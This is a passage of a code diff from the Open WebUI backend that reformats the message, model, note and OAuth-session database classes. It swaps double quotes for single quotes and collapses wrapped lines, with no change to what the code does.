( - reply_to_message.model_dump() if reply_to_message else None - ), - "latest_reply_at": ( - thread_replies[0].created_at if thread_replies else None - ), - "reply_count": len(thread_replies), - "reactions": reactions, + 'user': user_info, + 'reply_to_message': (reply_to_message.model_dump() if reply_to_message else None), + 'latest_reply_at': (thread_replies[0].created_at if thread_replies else None), + 'reply_count': len(thread_replies), + 'reactions': reactions, } ) - def get_thread_replies_by_message_id( - self, id: str, db: Optional[Session] = None - ) -> list[MessageReplyToResponse]: + def get_thread_replies_by_message_id(self, id: str, db: Optional[Session] = None) -> list[MessageReplyToResponse]: with get_db_context(db) as db: - all_messages = ( - db.query(Message) - .filter_by(parent_id=id) - .order_by(Message.created_at.desc()) - .all() - ) + all_messages = db.query(Message).filter_by(parent_id=id).order_by(Message.created_at.desc()).all() messages = [] for message in all_messages: reply_to_message = ( - self.get_message_by_id( - message.reply_to_id, include_thread_replies=False, db=db - ) + self.get_message_by_id(message.reply_to_id, include_thread_replies=False, db=db) if message.reply_to_id else None ) - webhook_info = message.meta.get("webhook") if message.meta else None + webhook_info = message.meta.get('webhook') if message.meta else None user_info = None - if webhook_info and webhook_info.get("id"): - webhook = Channels.get_webhook_by_id(webhook_info.get("id"), db=db) + if webhook_info and webhook_info.get('id'): + webhook = Channels.get_webhook_by_id(webhook_info.get('id'), db=db) if webhook: user_info = { - "id": webhook.id, - "name": webhook.name, - "role": "webhook", + 'id': webhook.id, + 'name': webhook.name, + 'role': 'webhook', } else: user_info = { - "id": webhook_info.get("id"), - "name": "Deleted Webhook", - "role": "webhook", + 'id': webhook_info.get('id'), + 'name': 'Deleted Webhook', + 'role': 'webhook', } messages.append( MessageReplyToResponse.model_validate( { **MessageModel.model_validate(message).model_dump(), - "user": user_info, - "reply_to_message": ( - reply_to_message.model_dump() - if reply_to_message - else None - ), + 'user': user_info, + 'reply_to_message': (reply_to_message.model_dump() if reply_to_message else None), } ) ) return messages - def get_reply_user_ids_by_message_id( - self, id: str, db: Optional[Session] = None - ) -> list[str]: + def get_reply_user_ids_by_message_id(self, id: str, db: Optional[Session] = None) -> list[str]: with get_db_context(db) as db: - return [ - message.user_id - for message in db.query(Message).filter_by(parent_id=id).all() - ] + return [message.user_id for message in db.query(Message).filter_by(parent_id=id).all()] def get_messages_by_channel_id( self, @@ -318,40 +294,34 @@ def get_messages_by_channel_id( messages = [] for message in all_messages: reply_to_message = ( - self.get_message_by_id( - message.reply_to_id, include_thread_replies=False, db=db - ) + self.get_message_by_id(message.reply_to_id, include_thread_replies=False, db=db) if message.reply_to_id else None ) - webhook_info = message.meta.get("webhook") if message.meta else None + webhook_info = message.meta.get('webhook') if message.meta else None user_info = None - if webhook_info and webhook_info.get("id"): - webhook = Channels.get_webhook_by_id(webhook_info.get("id"), db=db) + if webhook_info and webhook_info.get('id'): + webhook = Channels.get_webhook_by_id(webhook_info.get('id'), db=db) if webhook: user_info = { - "id": webhook.id, - "name": webhook.name, - "role": "webhook", + 'id': webhook.id, + 'name': webhook.name, + 'role': 'webhook', } else: user_info = { - "id": webhook_info.get("id"), - "name": "Deleted Webhook", - "role": "webhook", + 'id': webhook_info.get('id'), + 'name': 'Deleted Webhook', + 'role': 'webhook', } messages.append( MessageReplyToResponse.model_validate( { **MessageModel.model_validate(message).model_dump(), - "user": user_info, - "reply_to_message": ( - reply_to_message.model_dump() - if reply_to_message - else None - ), + 'user': user_info, + 'reply_to_message': (reply_to_message.model_dump() if reply_to_message else None), } ) ) @@ -387,55 +357,42 @@ def get_messages_by_parent_id( messages = [] for message in all_messages: reply_to_message = ( - self.get_message_by_id( - message.reply_to_id, include_thread_replies=False, db=db - ) + self.get_message_by_id(message.reply_to_id, include_thread_replies=False, db=db) if message.reply_to_id else None ) - webhook_info = message.meta.get("webhook") if message.meta else None + webhook_info = message.meta.get('webhook') if message.meta else None user_info = None - if webhook_info and webhook_info.get("id"): - webhook = Channels.get_webhook_by_id(webhook_info.get("id"), db=db) + if webhook_info and webhook_info.get('id'): + webhook = Channels.get_webhook_by_id(webhook_info.get('id'), db=db) if webhook: user_info = { - "id": webhook.id, - "name": webhook.name, - "role": "webhook", + 'id': webhook.id, + 'name': webhook.name, + 'role': 'webhook', } else: user_info = { - "id": webhook_info.get("id"), - "name": "Deleted Webhook", - "role": "webhook", + 'id': webhook_info.get('id'), + 'name': 'Deleted Webhook', + 'role': 'webhook', } messages.append( MessageReplyToResponse.model_validate( { **MessageModel.model_validate(message).model_dump(), - "user": user_info, - "reply_to_message": ( - reply_to_message.model_dump() - if reply_to_message - else None - ), + 'user': user_info, + 'reply_to_message': (reply_to_message.model_dump() if reply_to_message else None), } ) ) return messages - def get_last_message_by_channel_id( - self, channel_id: str, db: Optional[Session] = None - ) -> Optional[MessageModel]: + def get_last_message_by_channel_id(self, channel_id: str, db: Optional[Session] = None) -> Optional[MessageModel]: with get_db_context(db) as db: - message = ( - db.query(Message) - .filter_by(channel_id=channel_id) - .order_by(Message.created_at.desc()) - .first() - ) + message = db.query(Message).filter_by(channel_id=channel_id).order_by(Message.created_at.desc()).first() return MessageModel.model_validate(message) if message else None def get_pinned_messages_by_channel_id( @@ -513,11 +470,7 @@ def add_reaction_to_message( ) -> Optional[MessageReactionModel]: with get_db_context(db) as db: # check for existing reaction - existing_reaction = ( - db.query(MessageReaction) - .filter_by(message_id=id, user_id=user_id, name=name) - .first() - ) + existing_reaction = db.query(MessageReaction).filter_by(message_id=id, user_id=user_id, name=name).first() if existing_reaction: return MessageReactionModel.model_validate(existing_reaction) @@ -535,9 +488,7 @@ def add_reaction_to_message( db.refresh(result) return MessageReactionModel.model_validate(result) if result else None - def get_reactions_by_message_id( - self, id: str, db: Optional[Session] = None - ) -> list[Reactions]: + def get_reactions_by_message_id(self, id: str, db: Optional[Session] = None) -> list[Reactions]: with get_db_context(db) as db: # JOIN User so all user info is fetched in one query results = ( @@ -552,28 +503,26 @@ def get_reactions_by_message_id( for reaction, user in results: if reaction.name not in reactions: reactions[reaction.name] = { - "name": reaction.name, - "users": [], - "count": 0, + 'name': reaction.name, + 'users': [], + 'count': 0, } - reactions[reaction.name]["users"].append( + reactions[reaction.name]['users'].append( { - "id": user.id, - "name": user.name, + 'id': user.id, + 'name': user.name, } ) - reactions[reaction.name]["count"] += 1 + reactions[reaction.name]['count'] += 1 return [Reactions(**reaction) for reaction in reactions.values()] def remove_reaction_by_id_and_user_id_and_name( self, id: str, user_id: str, name: str, db: Optional[Session] = None ) -> bool: with get_db_context(db) as db: - db.query(MessageReaction).filter_by( - message_id=id, user_id=user_id, name=name - ).delete() + db.query(MessageReaction).filter_by(message_id=id, user_id=user_id, name=name).delete() db.commit() return True @@ -612,21 +561,15 @@ def search_messages_by_channel_ids( with get_db_context(db) as db: query_builder = db.query(Message).filter( Message.channel_id.in_(channel_ids), - Message.content.ilike(f"%{query}%"), + Message.content.ilike(f'%{query}%'), ) if start_timestamp: - query_builder = query_builder.filter( - Message.created_at >= start_timestamp - ) + query_builder = query_builder.filter(Message.created_at >= start_timestamp) if end_timestamp: - query_builder = query_builder.filter( - Message.created_at <= end_timestamp - ) + query_builder = query_builder.filter(Message.created_at <= end_timestamp) - messages = ( - query_builder.order_by(Message.created_at.desc()).limit(limit).all() - ) + messages = query_builder.order_by(Message.created_at.desc()).limit(limit).all() return [MessageModel.model_validate(msg) for msg in messages]
backend/open_webui/models/models.py+68 −106 modified@@ -28,13 +28,13 @@ # ModelParams is a model for the data stored in the params field of the Model table class ModelParams(BaseModel): - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') pass # ModelMeta is a model for the data stored in the meta field of the Model table class ModelMeta(BaseModel): - profile_image_url: Optional[str] = "/static/favicon.png" + profile_image_url: Optional[str] = '/static/favicon.png' description: Optional[str] = None """ @@ -43,13 +43,13 @@ class ModelMeta(BaseModel): capabilities: Optional[dict] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') pass class Model(Base): - __tablename__ = "model" + __tablename__ = 'model' id = Column(Text, primary_key=True, unique=True) """ @@ -139,24 +139,18 @@ class ModelForm(BaseModel): class ModelsTable: - def _get_access_grants( - self, model_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("model", model_id, db=db) + def _get_access_grants(self, model_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('model', model_id, db=db) def _to_model_model( self, model: Model, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> ModelModel: - model_data = ModelModel.model_validate(model).model_dump( - exclude={"access_grants"} - ) - model_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(model_data["id"], db=db) + model_data = ModelModel.model_validate(model).model_dump(exclude={'access_grants'}) + model_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(model_data['id'], db=db) ) return ModelModel.model_validate(model_data) @@ -167,37 +161,32 @@ def insert_new_model( with get_db_context(db) as db: result = Model( **{ - **form_data.model_dump(exclude={"access_grants"}), - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + **form_data.model_dump(exclude={'access_grants'}), + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) db.add(result) db.commit() db.refresh(result) - AccessGrants.set_access_grants( - "model", result.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('model', result.id, form_data.access_grants, db=db) if result: return self._to_model_model(result, db=db) else: return None except Exception as e: - log.exception(f"Failed to insert a new model: {e}") + log.exception(f'Failed to insert a new model: {e}') return None def get_all_models(self, db: Optional[Session] = None) -> list[ModelModel]: with get_db_context(db) as db: all_models = db.query(Model).all() model_ids = [model.id for model in all_models] - grants_map = AccessGrants.get_grants_by_resources("model", model_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) return [ - self._to_model_model( - model, access_grants=grants_map.get(model.id, []), db=db - ) - for model in all_models + self._to_model_model(model, access_grants=grants_map.get(model.id, []), db=db) for model in all_models ] def get_models(self, db: Optional[Session] = None) -> list[ModelUserResponse]: @@ -209,7 +198,7 @@ def get_models(self, db: Optional[Session] = None) -> list[ModelUserResponse]: users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else [] users_dict = {user.id: user for user in users} - grants_map = AccessGrants.get_grants_by_resources("model", model_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) models = [] for model in all_models: @@ -222,7 +211,7 @@ def get_models(self, db: Optional[Session] = None) -> list[ModelUserResponse]: access_grants=grants_map.get(model.id, []), db=db, ).model_dump(), - "user": user.model_dump() if user else None, + 'user': user.model_dump() if user else None, } ) ) @@ -232,42 +221,37 @@ def get_base_models(self, db: Optional[Session] = None) -> list[ModelModel]: with get_db_context(db) as db: all_models = db.query(Model).filter(Model.base_model_id == None).all() model_ids = [model.id for model in all_models] - grants_map = AccessGrants.get_grants_by_resources("model", model_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) return [ - self._to_model_model( - model, access_grants=grants_map.get(model.id, []), db=db - ) - for model in all_models + self._to_model_model(model, access_grants=grants_map.get(model.id, []), db=db) for model in all_models ] def get_models_by_user_id( - self, user_id: str, permission: str = "write", db: Optional[Session] = None + self, user_id: str, permission: str = 'write', db: Optional[Session] = None ) -> list[ModelUserResponse]: models = self.get_models(db=db) - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return [ model for model in models if model.user_id == user_id or AccessGrants.has_access( user_id=user_id, - resource_type="model", + resource_type='model', resource_id=model.id, permission=permission, user_group_ids=user_group_ids, db=db, ) ] - def _has_permission(self, db, query, filter: dict, permission: str = "read"): + def _has_permission(self, db, query, filter: dict, permission: str = 'read'): return AccessGrants.has_permission_filter( db=db, query=query, DocumentModel=Model, filter=filter, - resource_type="model", + resource_type='model', permission=permission, ) @@ -285,55 +269,55 @@ def search_models( query = query.filter(Model.base_model_id != None) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: query = query.filter( or_( - Model.name.ilike(f"%{query_key}%"), - Model.base_model_id.ilike(f"%{query_key}%"), - User.name.ilike(f"%{query_key}%"), - User.email.ilike(f"%{query_key}%"), - User.username.ilike(f"%{query_key}%"), + Model.name.ilike(f'%{query_key}%'), + Model.base_model_id.ilike(f'%{query_key}%'), + User.name.ilike(f'%{query_key}%'), + User.email.ilike(f'%{query_key}%'), + User.username.ilike(f'%{query_key}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Model.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Model.user_id != user_id) # Apply access control filtering query = self._has_permission( db, query, filter, - permission="read", + permission='read', ) - tag = filter.get("tag") + tag = filter.get('tag') if tag: # TODO: This is a simple implementation and should be improved for performance like_pattern = f'%"{tag.lower()}"%' # `"tag"` inside JSON array meta_text = func.lower(cast(Model.meta, String)) query = query.filter(meta_text.like(like_pattern)) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') - if order_by == "name": - if direction == "asc": + if order_by == 'name': + if direction == 'asc': query = query.order_by(Model.name.asc()) else: query = query.order_by(Model.name.desc()) - elif order_by == "created_at": - if direction == "asc": + elif order_by == 'created_at': + if direction == 'asc': query = query.order_by(Model.created_at.asc()) else: query = query.order_by(Model.created_at.desc()) - elif order_by == "updated_at": - if direction == "asc": + elif order_by == 'updated_at': + if direction == 'asc': query = query.order_by(Model.updated_at.asc()) else: query = query.order_by(Model.updated_at.desc()) @@ -352,7 +336,7 @@ def search_models( items = query.all() model_ids = [model.id for model, _ in items] - grants_map = AccessGrants.get_grants_by_resources("model", model_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) models = [] for model, user in items: @@ -363,36 +347,26 @@ def search_models( access_grants=grants_map.get(model.id, []), db=db, ).model_dump(), - user=( - UserResponse(**UserModel.model_validate(user).model_dump()) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) return ModelListResponse(items=models, total=total) - def get_model_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ModelModel]: + def get_model_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ModelModel]: try: with get_db_context(db) as db: model = db.get(Model, id) return self._to_model_model(model, db=db) if model else None except Exception: return None - def get_models_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> list[ModelModel]: + def get_models_by_ids(self, ids: list[str], db: Optional[Session] = None) -> list[ModelModel]: try: with get_db_context(db) as db: models = db.query(Model).filter(Model.id.in_(ids)).all() model_ids = [model.id for model in models] - grants_map = AccessGrants.get_grants_by_resources( - "model", model_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) return [ self._to_model_model( model, @@ -404,9 +378,7 @@ def get_models_by_ids( except Exception: return [] - def toggle_model_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ModelModel]: + def toggle_model_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ModelModel]: with get_db_context(db) as db: try: model = db.query(Model).filter_by(id=id).first() @@ -422,30 +394,26 @@ def toggle_model_by_id( except Exception: return None - def update_model_by_id( - self, id: str, model: ModelForm, db: Optional[Session] = None - ) -> Optional[ModelModel]: + def update_model_by_id(self, id: str, model: ModelForm, db: Optional[Session] = None) -> Optional[ModelModel]: try: with get_db_context(db) as db: # update only the fields that are present in the model - data = model.model_dump(exclude={"id", "access_grants"}) + data = model.model_dump(exclude={'id', 'access_grants'}) result = db.query(Model).filter_by(id=id).update(data) db.commit() if model.access_grants is not None: - AccessGrants.set_access_grants( - "model", id, model.access_grants, db=db - ) + AccessGrants.set_access_grants('model', id, model.access_grants, db=db) return self.get_model_by_id(id, db=db) except Exception as e: - log.exception(f"Failed to update the model by id {id}: {e}") + log.exception(f'Failed to update the model by id {id}: {e}') return None def delete_model_by_id(self, id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - AccessGrants.revoke_all_access("model", id, db=db) + AccessGrants.revoke_all_access('model', id, db=db) db.query(Model).filter_by(id=id).delete() db.commit() @@ -458,17 +426,15 @@ def delete_all_models(self, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: model_ids = [row[0] for row in db.query(Model.id).all()] for model_id in model_ids: - AccessGrants.revoke_all_access("model", model_id, db=db) + AccessGrants.revoke_all_access('model', model_id, db=db) db.query(Model).delete() db.commit() return True except Exception: return False - def sync_models( - self, user_id: str, models: list[ModelModel], db: Optional[Session] = None - ) -> list[ModelModel]: + def sync_models(self, user_id: str, models: list[ModelModel], db: Optional[Session] = None) -> list[ModelModel]: try: with get_db_context(db) as db: # Get existing models @@ -483,37 +449,33 @@ def sync_models( if model.id in existing_ids: db.query(Model).filter_by(id=model.id).update( { - **model.model_dump(exclude={"access_grants"}), - "user_id": user_id, - "updated_at": int(time.time()), + **model.model_dump(exclude={'access_grants'}), + 'user_id': user_id, + 'updated_at': int(time.time()), } ) else: new_model = Model( **{ - **model.model_dump(exclude={"access_grants"}), - "user_id": user_id, - "updated_at": int(time.time()), + **model.model_dump(exclude={'access_grants'}), + 'user_id': user_id, + 'updated_at': int(time.time()), } ) db.add(new_model) - AccessGrants.set_access_grants( - "model", model.id, model.access_grants, db=db - ) + AccessGrants.set_access_grants('model', model.id, model.access_grants, db=db) # Remove models that are no longer present for model in existing_models: if model.id not in new_model_ids: - AccessGrants.revoke_all_access("model", model.id, db=db) + AccessGrants.revoke_all_access('model', model.id, db=db) db.delete(model) db.commit() all_models = db.query(Model).all() model_ids = [model.id for model in all_models] - grants_map = AccessGrants.get_grants_by_resources( - "model", model_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) return [ self._to_model_model( model, @@ -523,7 +485,7 @@ def sync_models( for model in all_models ] except Exception as e: - log.exception(f"Error syncing models for user {user_id}: {e}") + log.exception(f'Error syncing models for user {user_id}: {e}') return []
backend/open_webui/models/notes.py+58 −94 modified@@ -21,7 +21,7 @@ class Note(Base): - __tablename__ = "note" + __tablename__ = 'note' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text) @@ -88,62 +88,52 @@ class NoteListResponse(BaseModel): class NoteTable: - def _get_access_grants( - self, note_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("note", note_id, db=db) + def _get_access_grants(self, note_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('note', note_id, db=db) def _to_note_model( self, note: Note, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> NoteModel: - note_data = NoteModel.model_validate(note).model_dump(exclude={"access_grants"}) - note_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(note_data["id"], db=db) + note_data = NoteModel.model_validate(note).model_dump(exclude={'access_grants'}) + note_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(note_data['id'], db=db) ) return NoteModel.model_validate(note_data) - def _has_permission(self, db, query, filter: dict, permission: str = "read"): + def _has_permission(self, db, query, filter: dict, permission: str = 'read'): return AccessGrants.has_permission_filter( db=db, query=query, DocumentModel=Note, filter=filter, - resource_type="note", + resource_type='note', permission=permission, ) - def insert_new_note( - self, user_id: str, form_data: NoteForm, db: Optional[Session] = None - ) -> Optional[NoteModel]: + def insert_new_note(self, user_id: str, form_data: NoteForm, db: Optional[Session] = None) -> Optional[NoteModel]: with get_db_context(db) as db: note = NoteModel( **{ - "id": str(uuid.uuid4()), - "user_id": user_id, - **form_data.model_dump(exclude={"access_grants"}), - "created_at": int(time.time_ns()), - "updated_at": int(time.time_ns()), - "access_grants": [], + 'id': str(uuid.uuid4()), + 'user_id': user_id, + **form_data.model_dump(exclude={'access_grants'}), + 'created_at': int(time.time_ns()), + 'updated_at': int(time.time_ns()), + 'access_grants': [], } ) - new_note = Note(**note.model_dump(exclude={"access_grants"})) + new_note = Note(**note.model_dump(exclude={'access_grants'})) db.add(new_note) db.commit() - AccessGrants.set_access_grants( - "note", note.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('note', note.id, form_data.access_grants, db=db) return self._to_note_model(new_note, db=db) - def get_notes( - self, skip: int = 0, limit: int = 50, db: Optional[Session] = None - ) -> list[NoteModel]: + def get_notes(self, skip: int = 0, limit: int = 50, db: Optional[Session] = None) -> list[NoteModel]: with get_db_context(db) as db: query = db.query(Note).order_by(Note.updated_at.desc()) if skip is not None: @@ -152,13 +142,8 @@ def get_notes( query = query.limit(limit) notes = query.all() note_ids = [note.id for note in notes] - grants_map = AccessGrants.get_grants_by_resources("note", note_ids, db=db) - return [ - self._to_note_model( - note, access_grants=grants_map.get(note.id, []), db=db - ) - for note in notes - ] + grants_map = AccessGrants.get_grants_by_resources('note', note_ids, db=db) + return [self._to_note_model(note, access_grants=grants_map.get(note.id, []), db=db) for note in notes] def search_notes( self, @@ -171,36 +156,32 @@ def search_notes( with get_db_context(db) as db: query = db.query(Note, User).outerjoin(User, User.id == Note.user_id) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: # Normalize search by removing hyphens and spaces (e.g., "todo" matches "to-do" and "to do") - normalized_query = query_key.replace("-", "").replace(" ", "") + normalized_query = query_key.replace('-', '').replace(' ', '') query = query.filter( or_( + func.replace(func.replace(Note.title, '-', ''), ' ', '').ilike(f'%{normalized_query}%'), func.replace( - func.replace(Note.title, "-", ""), " ", "" - ).ilike(f"%{normalized_query}%"), - func.replace( - func.replace( - cast(Note.data["content"]["md"], Text), "-", "" - ), - " ", - "", - ).ilike(f"%{normalized_query}%"), + func.replace(cast(Note.data['content']['md'], Text), '-', ''), + ' ', + '', + ).ilike(f'%{normalized_query}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Note.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Note.user_id != user_id) # Apply access control filtering - if "permission" in filter: - permission = filter["permission"] + if 'permission' in filter: + permission = filter['permission'] else: - permission = "write" + permission = 'write' query = self._has_permission( db, @@ -209,21 +190,21 @@ def search_notes( permission=permission, ) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') - if order_by == "name": - if direction == "asc": + if order_by == 'name': + if direction == 'asc': query = query.order_by(Note.title.asc()) else: query = query.order_by(Note.title.desc()) - elif order_by == "created_at": - if direction == "asc": + elif order_by == 'created_at': + if direction == 'asc': query = query.order_by(Note.created_at.asc()) else: query = query.order_by(Note.created_at.desc()) - elif order_by == "updated_at": - if direction == "asc": + elif order_by == 'updated_at': + if direction == 'asc': query = query.order_by(Note.updated_at.asc()) else: query = query.order_by(Note.updated_at.desc()) @@ -244,7 +225,7 @@ def search_notes( items = query.all() note_ids = [note.id for note, _ in items] - grants_map = AccessGrants.get_grants_by_resources("note", note_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('note', note_ids, db=db) notes = [] for note, user in items: @@ -255,11 +236,7 @@ def search_notes( access_grants=grants_map.get(note.id, []), db=db, ).model_dump(), - user=( - UserResponse(**UserModel.model_validate(user).model_dump()) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) @@ -268,20 +245,16 @@ def search_notes( def get_notes_by_user_id( self, user_id: str, - permission: str = "read", + permission: str = 'read', skip: int = 0, limit: int = 50, db: Optional[Session] = None, ) -> list[NoteModel]: with get_db_context(db) as db: - user_group_ids = [ - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - ] + user_group_ids = [group.id for group in Groups.get_groups_by_member_id(user_id, db=db)] query = db.query(Note).order_by(Note.updated_at.desc()) - query = self._has_permission( - db, query, {"user_id": user_id, "group_ids": user_group_ids}, permission - ) + query = self._has_permission(db, query, {'user_id': user_id, 'group_ids': user_group_ids}, permission) if skip is not None: query = query.offset(skip) @@ -290,17 +263,10 @@ def get_notes_by_user_id( notes = query.all() note_ids = [note.id for note in notes] - grants_map = AccessGrants.get_grants_by_resources("note", note_ids, db=db) - return [ - self._to_note_model( - note, access_grants=grants_map.get(note.id, []), db=db - ) - for note in notes - ] + grants_map = AccessGrants.get_grants_by_resources('note', note_ids, db=db) + return [self._to_note_model(note, access_grants=grants_map.get(note.id, []), db=db) for note in notes] - def get_note_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[NoteModel]: + def get_note_by_id(self, id: str, db: Optional[Session] = None) -> Optional[NoteModel]: with get_db_context(db) as db: note = db.query(Note).filter(Note.id == id).first() return self._to_note_model(note, db=db) if note else None @@ -315,17 +281,15 @@ def update_note_by_id( form_data = form_data.model_dump(exclude_unset=True) - if "title" in form_data: - note.title = form_data["title"] - if "data" in form_data: - note.data = {**note.data, **form_data["data"]} - if "meta" in form_data: - note.meta = {**note.meta, **form_data["meta"]} + if 'title' in form_data: + note.title = form_data['title'] + if 'data' in form_data: + note.data = {**note.data, **form_data['data']} + if 'meta' in form_data: + note.meta = {**note.meta, **form_data['meta']} - if "access_grants" in form_data: - AccessGrants.set_access_grants( - "note", id, form_data["access_grants"], db=db - ) + if 'access_grants' in form_data: + AccessGrants.set_access_grants('note', id, form_data['access_grants'], db=db) note.updated_at = int(time.time_ns()) @@ -335,7 +299,7 @@ def update_note_by_id( def delete_note_by_id(self, id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - AccessGrants.revoke_all_access("note", id, db=db) + AccessGrants.revoke_all_access('note', id, db=db) db.query(Note).filter(Note.id == id).delete() db.commit() return True
backend/open_webui/models/oauth_sessions.py+35 −51 modified@@ -23,23 +23,21 @@ class OAuthSession(Base): - __tablename__ = "oauth_session" + __tablename__ = 'oauth_session' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text, nullable=False) provider = Column(Text, nullable=False) - token = Column( - Text, nullable=False - ) # JSON with access_token, id_token, refresh_token + token = Column(Text, nullable=False) # JSON with access_token, id_token, refresh_token expires_at = Column(BigInteger, nullable=False) created_at = Column(BigInteger, nullable=False) updated_at = Column(BigInteger, nullable=False) # Add indexes for better performance __table_args__ = ( - Index("idx_oauth_session_user_id", "user_id"), - Index("idx_oauth_session_expires_at", "expires_at"), - Index("idx_oauth_session_user_provider", "user_id", "provider"), + Index('idx_oauth_session_user_id', 'user_id'), + Index('idx_oauth_session_expires_at', 'expires_at'), + Index('idx_oauth_session_user_provider', 'user_id', 'provider'), ) @@ -71,7 +69,7 @@ class OAuthSessionTable: def __init__(self): self.encryption_key = OAUTH_SESSION_TOKEN_ENCRYPTION_KEY if not self.encryption_key: - raise Exception("OAUTH_SESSION_TOKEN_ENCRYPTION_KEY is not set") + raise Exception('OAUTH_SESSION_TOKEN_ENCRYPTION_KEY is not set') # check if encryption key is in the right format for Fernet (32 url-safe base64-encoded bytes) if len(self.encryption_key) != 44: @@ -83,7 +81,7 @@ def __init__(self): try: self.fernet = Fernet(self.encryption_key) except Exception as e: - log.error(f"Error initializing Fernet with provided key: {e}") + log.error(f'Error initializing Fernet with provided key: {e}') raise def _encrypt_token(self, token) -> str: @@ -93,7 +91,7 @@ def _encrypt_token(self, token) -> str: encrypted = self.fernet.encrypt(token_json.encode()).decode() return encrypted except Exception as e: - log.error(f"Error encrypting tokens: {e}") + log.error(f'Error encrypting tokens: {e}') raise def _decrypt_token(self, token: str): @@ -102,7 +100,7 @@ def _decrypt_token(self, token: str): decrypted = self.fernet.decrypt(token.encode()).decode() return json.loads(decrypted) except Exception as e: - log.error(f"Error decrypting tokens: {type(e).__name__}: {e}") + log.error(f'Error decrypting tokens: {type(e).__name__}: {e}') raise def create_session( @@ -120,13 +118,13 @@ def create_session( result = OAuthSession( **{ - "id": id, - "user_id": user_id, - "provider": provider, - "token": self._encrypt_token(token), - "expires_at": token.get("expires_at"), - "created_at": current_time, - "updated_at": current_time, + 'id': id, + 'user_id': user_id, + 'provider': provider, + 'token': self._encrypt_token(token), + 'expires_at': token.get('expires_at'), + 'created_at': current_time, + 'updated_at': current_time, } ) @@ -141,12 +139,10 @@ def create_session( else: return None except Exception as e: - log.error(f"Error creating OAuth session: {e}") + log.error(f'Error creating OAuth session: {e}') return None - def get_session_by_id( - self, session_id: str, db: Optional[Session] = None - ) -> Optional[OAuthSessionModel]: + def get_session_by_id(self, session_id: str, db: Optional[Session] = None) -> Optional[OAuthSessionModel]: """Get OAuth session by ID""" try: with get_db_context(db) as db: @@ -158,7 +154,7 @@ def get_session_by_id( return None except Exception as e: - log.error(f"Error getting OAuth session by ID: {e}") + log.error(f'Error getting OAuth session by ID: {e}') return None def get_session_by_id_and_user_id( @@ -167,19 +163,15 @@ def get_session_by_id_and_user_id( """Get OAuth session by ID and user ID""" try: with get_db_context(db) as db: - session = ( - db.query(OAuthSession) - .filter_by(id=session_id, user_id=user_id) - .first() - ) + session = db.query(OAuthSession).filter_by(id=session_id, user_id=user_id).first() if session: db.expunge(session) session.token = self._decrypt_token(session.token) return OAuthSessionModel.model_validate(session) return None except Exception as e: - log.error(f"Error getting OAuth session by ID: {e}") + log.error(f'Error getting OAuth session by ID: {e}') return None def get_session_by_provider_and_user_id( @@ -201,12 +193,10 @@ def get_session_by_provider_and_user_id( return None except Exception as e: - log.error(f"Error getting OAuth session by provider and user ID: {e}") + log.error(f'Error getting OAuth session by provider and user ID: {e}') return None - def get_sessions_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> List[OAuthSessionModel]: + def get_sessions_by_user_id(self, user_id: str, db: Optional[Session] = None) -> List[OAuthSessionModel]: """Get all OAuth sessions for a user""" try: with get_db_context(db) as db: @@ -220,15 +210,15 @@ def 